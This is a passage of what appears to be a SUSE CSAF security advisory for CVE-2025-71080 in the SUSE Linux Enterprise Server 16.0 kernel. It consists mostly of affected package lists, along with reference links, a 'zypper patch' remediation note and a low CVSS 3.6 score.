"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-71080",
"url": "https://www.suse.com/security/cve/CVE-2025-71080"
},
{
"category": "external",
"summary": "SUSE Bug 1256608 for CVE-2025-71080",
"url": "https://bugzilla.suse.com/1256608"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 3.6,
"baseSeverity": "LOW",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:L/A:L",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
